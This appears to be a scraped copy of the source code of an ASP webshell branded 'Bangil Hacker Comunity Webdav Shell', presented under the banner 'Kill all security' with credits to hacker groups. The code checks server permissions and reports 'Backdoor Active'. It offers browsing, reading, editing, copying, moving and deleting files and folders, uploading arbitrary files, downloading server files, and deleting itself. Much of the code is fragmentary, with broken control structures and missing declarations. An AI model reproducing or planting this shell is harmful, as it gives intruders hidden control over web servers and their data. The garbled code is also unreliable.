Professional Documents
Culture Documents
Bangil Hacker Comunity Shell
Bangil Hacker Comunity Shell
<%
' ####
' ### Bangil Hacker Comunity Webdav Shell
' ### Kill all security
' ####
'Karakter Kodlamasy
Session.CodePage=1254
%>
<html>
<head>
<link rel="SHORTCUT ICON"
href="https://www.facebook.com/download/224628581067439/Logo.png">
<title>[+][=]Bangil Hacker Comunity[=][+]</title>
<meta http-equiv="Content-Type" content="text/html; charSet=iso-8859-9">
</head>
<style type="text/css">
body, table{
background-color:#000;
color:#00ff00;
font-family:Verdana, Geneva, sans-serif;
font-size:12px;
}
#baslik{
font-family:Verdana, Geneva, sans-serif;
font-size:18px;
font-weight:bold
}
#drivers{
font-weight:bold
}
a{
color:#00ff00;
text-decoration:none
}
a:hover{
color:#F00;
text-decoration:overline underline
}
input{
font-family:tahoma;
background-color:#000;
color:#00ff00
}
div#path{
position:fixed;
top:0px;
left:0px;
width:100%;
background-color:#000;
height:55px;
font-size:10px;
z-index:5;
font-weight:bold;
color:#00ff00;
padding-left:5px;
font-size:12px;
font-family:tahoma
}
* html div#path{
position: absolute !important;
top: expression(((document.documentElement.scrollTop || document.body.scrollTop) +
this.offsetHeight-90) + ""px"");
left:0px;
width:100%;
background-color:#000;
height:25px;
font-size:10px;
z-index:5;
font-weight:bold;
color:#00ff00;
padding-left:5px
}
</style>
<script>
function CodeHuntersPopup(){
yeniPencere = window.open('', 'Bangil Hacker
Comunity','height=200,width=300resizable=0,status=0,left=100,top=50,scrollbars=0,me
nubar=0,toolbar=0');
yeniPencere.document.write('<title>Bangil Hacker Comunity</title><style
type="text/css">body{background-color:#000;color:#00ff00;font-family:Verdana,
Geneva, sans-serif;font-size:12px;}</style><b>Bangil Hacker Comunity</b><br><br>[-]
Recoded By Bangil Hacker Comunity & TurkHack Team<br> All Rights Reserved <br><br>
[-] Contact <u>facebook.com/rhymelody</u> For Report Bug<br><br>[-] Special Thanks
to : Allah | ./TheFallen404 | Garuda Cyber Army | IDCA | JKT48 Cyber Team | Bangil
Hacker Comunity | All Indonesian Hacker Family & All Muslim <br><br> [-] Special
Edition For Technic WEBDAV Shell Maker Or Rootkit')}
</script>
<body>
<br><br><br><br>
<div id="baslik" align="center"><img
src="https://www.facebook.com/download/224628581067439/Logo.png"
style="cursor:pointer" alt="El-Yofro Xhell" title="El-Yofro Xhell"
onClick="CodeHuntersPopup()"></div><br>
<br>
<%
'Dosya Yolu Urlden �ekiliyor / karakteri \ karakteri olarak de?i?tiriliyor
Path=Replace(Request.QueryString("Path"),"/","\")
islem=Request.QueryString("islem")
'E?er dosyayolu bo? ise dosya yolu shellimizin bulundu?u klas�re ayarlanyyor
If Path="" Then
Path = Server.Mappath("/")
End If
'Evillord 2011
If islem<>"" Then
Dizin = Mid(Path,1,Instrrev(Path,"\"))
Else
Dizin = Path
End If
End If
On Error GoTo 0
On Error Resume Next
Response.Write(" Reaksine: ")
'A?a?yda �nce ge�ici bir dosya olu?turacaz olu?turabiliyor ise yazma yetkisi
var yazacak. Dosyayy okuyabiliyosa okuma yetkisi var yazacak. Dosyayy silebiliyorsa
silme yetkisi var yazacak.
'Yazma Yetkisi
Set DosyaOlustur = Fso.CreateTextFile(Dizin & "\CodeHunters.txt", True)
Set DosyaOlustur = Nothing
'Hata verirse yazma yetkisi yok, Hata vermezse yazma yetkisi var
If Err<>0 then
Response.Write "Safemode <u>Off</u> | "
Else
Response.Write "Safemode <u>On</u> | "
End If
' E?er Yazma Yetkisinde Hata verirse silme yetkisinde vermemesi i�in a?a?ydaki
kodlary yazyyoruz
On Error GoTo 0
On Error Resume Next
'Okuma Yetkisi
If Err<>0 then
Response.Write "Backdoor <u>Inactive</u> | "
Else
Response.Write "Backdoor <u>Active</u> | "
End If
On Error GoTo 0
On Error Resume Next
'Silme Yetkisi
If Err<>0 then
Response.Write "Access NOT Guaranteed "
Else
Response.Write "Access Guaranteed "
End If
On Error GoTo 0
On Error Resume Next
Response.Write("</div>")&vbcrlf
'---
' Dosya i�eri?ini g�r�nt�leme sayfasy
Case "Read"
Response.Write("<br>"&qa.path&" i�eri?i<br><br><hr><code>")
'Dosya a�ylyyor
Set Ag = qa.OpenAsTextStream(1,0)
' Readall komutuyla dosya i�eri?ini �ekince d�z yazy ?eklinde geldi?inden
satyrlara b�lmek i�in split komutu ile vbcrlf karakteri g�r�len yerlerden par�alama
i?lemi yapyyoruz
icerik = Split(kod,vbcrlf)
Response.Write("</code><hr>")
'---
' Text, Asp, Php Gibi Uzantyly Yazy I�erikli Dosyalaryn I�eri?ini D�zenleyen
Sayfa)
Case "Edit"
If Request.QueryString("action")=1 Then
'Dosyanyn varly?y kontrol ediliyor
If FSO.FileExists(Path)= False Then
Response.Write("Dosya Bulunamady")
Response.End
End If
Else
'Dosya a�ylyyor
Set Ag = qa.OpenAsTextStream(1,0)
Response.Write("<form action=""?islem=Edit&path="&path&"&action=1""
method=""post""><textarea name=""texticerik"" cols=""80""
rows=""25"">"&kod&"</textarea><br><input type=""submit"" value=""Yes""></form>")
End If
If Request.QueryString("action")=1 Then
NewName=Request.Form("NewName")
Hedef=Request.Form("hedef")
'Klas�r Ta?ynyyor
KlasorTasi.Move Hedef
Response.Write "Klas�r "& Hedef & " Dizinine Ta?yndy"
Else
Response.Write Path&" Klas�r�n� Ta?y<br><br><form action=""?
islem=FolderMove&action=1&Path="&Path&""" method=""post""><b>Ta?ynacak Dizin:
</b><input type=""text"" name=""hedef"" value="""&Dizin&""" size=50><br><input
type=""submit"" value=""Ta?y"" style=""width:100px""></form>"
End If
If Request.QueryString("action")=1 Then
Hedef=Request.Form("hedef")
'Dosya kopyalanyyor
KlasorKopyala.Copy Hedef
'
'Dosya Kopyalama Sayfasy
Case "FileCopy"
If FSO.FileExists(Path)=False Then
Response.Write("<br>Dosya Bulunamady")
Response.End
End If
Set DosyaTasi = FSO.GetFile(Path)
If Request.QueryString("action")=1 Then
Set DosyaKopyala = FSO.GetFile(Path)
Hedef=Request.Form("hedef")
DosyaKopyala.Copy Hedef
Response.Write "Dosya "& Hedef & " Dizinine Kopyalandy"
Else
Response.Write "<form action=""?islem=FileCopy&action=1&Path="&Path&"""
method=""post""><b>Copy File: </b><input type=""text"" name=""hedef""
value="""&Path&""" size=50><br><input type=""submit"" value=""Ok""
style=""width:100px""></form>"
End If
If Request.QueryString("action")=1 Then
Hedef=Request.Form("hedef")
'Dosya ta?ynyyor
DosyaTasi.Move Hedef
Response.Write "Dosya "& Hedef & " Dizinine Ta?yndy"
Else
Response.Write Path&" Realy want to Move this File?<br><br><form action=""?
islem=FileMove&action=1&Path="&Path&""" method=""post""><b>Move to: </b><input
type=""text"" name=""hedef"" value="""&DosyaTasi.ParentFolder&"""
size=50><br><input type=""submit"" value=""Ok"" style=""width:100px""></form>"
End If
'Dosya siliniyor
DosyaSil.Delete
If Request.QueryString("action")=1 Then
'Klas�r siliniyor
KlasorSil.Delete
Response.Write "Klas�r Silindi.<br><br><a href=""?
Path="&Mid(Path,1,InStrRev(Path,"\"))&""">Geri D�n</a>"
Else
Response.Write("<b>"&Path&"</b><br>Klas�r�n� ve I�indeki Dosyalary Ger�ekten
Silmek Istiyor musunuz? <a href=""?
islem=FolderDelete&action=1&Path="&Path&""">Sil</a> </a>")
End If
'Dosya olu?turuluyor
Fso.CreateFolder Path&"\"&Trim(Request.Form("foldername"))
DosyaAdi = Request.Form("filename")
'Klas�r� Belirtiyoruz
Set Klasor = FSO.GetFolder(Path)
'Dosyayy Olu?turuyoruz
Set DosyaOlustur = Klasor.CreateTextFile(DosyaAdi)
'Dosya i�eri?ini Yazdyyoruz
DosyaOlustur.Write(Request.Form("icerik"))
DosyaOlustur.Close
Set DosyaOlustur = Nothing
Else
Response.Write("<form action=""?islem=CreateFile&action=1&Path="&Path&"""
method=""post"">File Name<input type=""text"" name=""filename""><br><textarea
name=""icerik"" cols=80 rows=25></textarea><br><input style=""width:500px""
type=""submit"" value=""Olu?tur""></form>")
End If
'upload Y?lemleri
Case "Upload"
Response.Buffer = True
Response.Expires = 0
oFile.SaveAsFile
If oFile.UploadSuccessful Then
Response.Write "> Basariyla Y�klendi<BR>"
oFO.ShowUploadForm
End If
'Dosya Arama
Case "Search"
Server.ScriptTimeOut=99999
If Request.QueryString("action")="1" Then
Search=Request.Form("Search")
Response.Write "<table width=""95%"" cellpadding=""4"" cellspacing=""1""
align=""left"">"
Sub DosyaAra(KlasorYolu)
End Sub
DosyaAra Path
Else
Response.Write "<form action=""?islem=Search&action=1&Path="&Path&"""
method=""post"">Find Directory: "&Path&"<br><br>Find with Keyword <input
type=""text"" name=""search""><input type=""submit"" value=""Go""></form"
End If
Dosya = Request.QueryString("dosya")
Response.Clear
Response.ContentType = "application/x-msdownload"
'response.contenttype="application/force-download"
Response.AddHeader "cache-control","private"
Response.AddHeader "content-transfer-encoding", "binary"
Response.AddHeader "content-disposition", "attachment; filename=" & Mid(dosya,
instrrev(dosya, "\") + 1, Len(dosya) - instrrev(dosya, "\"))
Set Dosyaindir = Server.CreateObject("Adodb.Stream")
Dosyaindir.type = 1
Dosyaindir.Open
Dosyaindir.LoadFromFile Dosya
Response.BinaryWrite Dosyaindir.Read
Dosyaindir.Close
Set Dosyaindir = Nothing
Response.End
Url = Request.Form("url")
If Len(Trim(Url))=0 Then
Response.Write("<form action=""?islem=Dosyaindir&Path="&Path&"""
method=""post"">File Directory: "&Path&"<br><br>Url: <input type=""text""
name=""url""><input type=""submit"" value=""Download""></form>")
Else
End If
Case "ShellDelete"
FileName=Request.ServerVariables("SCRIPT_NAME")
Fso.DeleteFile Server.Mappath("\")&Replace(FileName,"/","\")
Response.Write("Shell Terhapus...")
End Select
If Err.number<>0 Then
Response.Write("<br><br><b>"&Err.description&"</b>")
End If
%>
<br><br><br><br>
</html>
<%
'Uplaod Synyfy Ba?langy�
Class FileUpload
Private UploadRequest, oProps, iFrmCt
Private iKnownFileCount, iKnownFormCount
Private oOutFiles
sReqMeth = Request.ServerVariables("REQUEST_METHOD")
Select Case UCase(sReqMeth)
Case "POST"
sEncType = GetFormEncType
Select Case sEncType
Case "MULTIPART/FORM-DATA"
Case "APPLICATION/X-WWW-FORM-URLENCODED"
End Select
End Select
arr = uploadrequest.keys
iFrmCt = ubound(arr)
For Each key In arr
If isobject(uploadrequest.item(key)) Then
iKnownProps = ubound(uploadrequest.item(key).keys) + 1
If iKnownProps = 4 Then
iKnownFileCount = iKnownFileCount + 1
Set fofilecheck = new FO_FileChecker
'Dosya ismi, input de?eri gibi bilgiler formdan
�ekiliyor
fofilecheck.SetCurrentProperties oProps
fofilecheck.FileInput_NamePath =
uploadrequest.item(key).item("FileName")
fofilecheck.FileInput_ContentType =
uploadrequest.item(key).item("ContentType")
fofilecheck.FileInput_BinaryText =
uploadrequest.item(key).item("Value")
fofilecheck.FileInput_FormInputName =
uploadrequest.item(key).item("InputName")
Set oFile = fofilecheck.ValidateVerifyReturnFile()
Set fofilecheck = Nothing
If isobject(UploadRequest.Item(inputName)) Then
vTmp = UploadRequest.Item(inputName).Item("Value")
If len(trim(CStr(vTmp))) = 0 Then
FormEx = vDefaultValue
Exit Function
End If
FormEx = vTmp
Exit Function
End If
FormEx = vDefaultValue
End Function
With Response
.Write("Directory File : "&Path&"<FORM ENCTYPE=""multipart/form-data""
ACTION=""?islem=Upload&Path="&Path&""" METHOD=""POST"">" & vbCrLf)
.Write("Pilih File:<br><INPUT TYPE=""FILE"" NAME=""blob"" src=""xx""
class=""files"" style=""width: 200px;border:1px solid #CCC;margin: 5px 0 0
0;""><BR><BR>" & vbCrLf)
.Write("<INPUT NAME=""myName"" type=""Hidden"" >" & vbCrLf)
.Write("<INPUT TYPE=""SUBMIT"" VALUE=""Upload File"">" & vbCrLf)
.Write("</FORM>" & vbCrLf)
End With
End Sub
End Class
Class FO_FileChecker
Private oProps, sFileName, hFileBinLen, sFileBin, sFileContentType,
sFileFormInputName
sFileName = trim(realfilename)
End Property
binlen = lenb(binstring)
hFileBinLen = binlen
sFileBin = binstring
End Property
If FileNameBadOrExists Then
Set ValidateVerifyReturnFile = FillFOFileObj(false, "", "", "bir
dosya se�mediniz ya da se�ti?iniz dosya yolu yanly?; bir di?er olasylyk se�ti?iniz
dosya zaten y�kl�", "", "", "", sFileFormInputName)
Exit Function
End If
If len(trim(sFileName)) = 0 Then
FileNameBadOrExists = true
Exit Function
End If
If oProps.AllowOverWrite Then
FileNameBadOrExists = false
Exit Function
End If
End Class
Class FO_Processor
Private Function getByteString(byval StringStr)
dim char, i
For i = 1 to Len(StringStr)
char = Mid(StringStr, i, 1)
getByteString = getByteString & chrB(AscB(char))
Next
End Function
getString =""
For intCount = 1 to LenB(StringBin)
getString = getString & chr(AscB(MidB(StringBin, intCount, 1)))
Next
End Function
blast = false
i = -1
do while i <> 0
If i = -1 Then
i = 1
Else
i = i + 1
End If
j = instr(i, sPostStr, "=") + 1
sName = mid(sPostStr, i, j-i-1)
i = instr(j, sPostStr, "&")
If i = 0 Then
vValue = mid(sPostStr, j)
Else
vValue = mid(sPostStr, j, i - j)
End If
Dim uploadcontrol
Set uploadcontrol = createobject("Scripting.Dictionary")
uploadcontrol.add "Value", vValue
If lenb(RequestBin) = 0 Then
exit sub
End If
PosBeg = 1
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
If posend = 0 Then
BuildUploadRequest_ASCII getString(requestbin), UploadRequest
Exit Sub
End If
boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
boundaryPos = InstrB(1,RequestBin,boundary)
Do until (boundaryPos=InstrB(RequestBin,boundary &
getByteString("--")))
Dim UploadControl
Set UploadControl = Server.CreateObject("Scripting.Dictionary")
Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-
Disposition"))
Pos = InstrB(Pos,RequestBin,getByteString("name="))
PosBeg = Pos+6
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
PosFile =
InstrB(BoundaryPos,RequestBin,getByteString("filename="))
PosBound = InstrB(PosEnd,RequestBin,boundary)
isfile = false
isfile = true
Else
Pos = InstrB(Pos,RequestBin,getByteString(chr(13)))
PosBeg = Pos+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
isfile = false
End If
UploadControl.Add "Value" , Value
UploadControl.Add "InputName", Name
If not uploadrequest.exists(name) Then
UploadRequest.Add name, UploadControl
Else
If not isfile Then
Set tmphash = uploadrequest(name)
tmphash("Value") = tmphash("Value") & ", " & Value
Set uploadrequest(name) = tmphash
End If
End If
BoundaryPos=InstrB(BoundaryPos+LenB(boundary),RequestBin,boundary)
Loop
End Sub
End Class
Class FO_File
Public bSuccess
Public sAbsPath
Public sVirPath
Public sStdErr
Public sCType
Public frmInputName
Public binValue
Private hBtCt, sURiPath, sFiExt
private sfinme
Private oProps
If LenB(binValue) = 0 Then
Exit Sub
End If
If IsObject(oField) Then
On Error Resume Next
oField.AppendChunk binValue
If Err Then
sStdErr = Err.Description
bBtCt = 0
bSuccess = false
Exit Sub
End If
On Error GoTo 0
hBtCt = lenb(binValue)
bSuccess = true
End If
End Sub
If oProps.UploadDisabled Then
bBtCt = 0
bSuccess = false
sStdErr = "Y�kleme Sayfa Y�netimi Tarafyndan Engellendi"
Exit Function
End If
SaveAsBinaryString = binValue
hBtCt = lenb(binValue)
bSuccess = true
End Function
If LenB(binValue) = 0 Then
bBtCt = 0
bSuccess = false
Exit Function
End If
If oProps.UploadDisabled Then
bBtCt = 0
bSuccess = false
sStdErr = "Y�kleme Sayfa Y�netimi Tarafyndan Engellendi"
Exit Function
End If
outstr = ""
For i = 1 to LenB( binValue )
outstr = outstr & chr( AscB( MidB( binValue, i, 1) ) )
Next
SaveAsString = outstr
hBtCt = lenb(binValue)
bSuccess = true
End Function
If LenB(binValue) = 0 Then
bBtCt = 0
bSuccess = false
Exit Function
End If
If oProps.UploadDisabled Then
bBtCt = 0
bSuccess = false
sStdErr = "Y�kleme Sayfa Y�netimi Tarafyndan Engellendi"
Exit Function
End If
Set oEnc = New Base64Encoder
outstr = oEnc.EncodeStr(binValue)
Set oEnc = Nothing
SaveAsBase64EncodedStr = outstr
hBtCt = lenb(binValue)
bSuccess = true
End Function
Set ScriptObject =
Server.CreateObject("Scripting.FileSystemObject")
Set NewFile = ScriptObject.CreateTextFile( NAME )
For i = 1 to LenB( CONTENTS )
NewFile.Write chr( AscB( MidB( CONTENTS, i, 1) ) )
Next
NewFile.Close
Set NewFile = Nothing
Set ScriptObject = Nothing
strRoot = Server.Mappath("/")
tmp = replace( lcase( pathname ), lcase( strRoot ), "" )
tmp = replace( tmp, "\", "/" )
UnMappath = tmp
End Function
End If
If oFileChk.FileNameBadOrExists Then
sStdErr = "The file name is invalid or the file already exists
and overwrite Denied?"
bSuccess = false
Set oFileChk = Nothing
Exit Property
End If
sStdErr = ""
sFileName = newfilename
End Property
Class FO_Properties
Private sErrHead
Private sErrMsg
Private arrExt
Private strUploadDir
Private boolAllowOverwrite
Private lngUploadSize
Private bMin
Private bByPass
bDoesntExist = false
strUploadDir = strInput
End Property
End Class
Class Base64Encoder
Private Base64Chars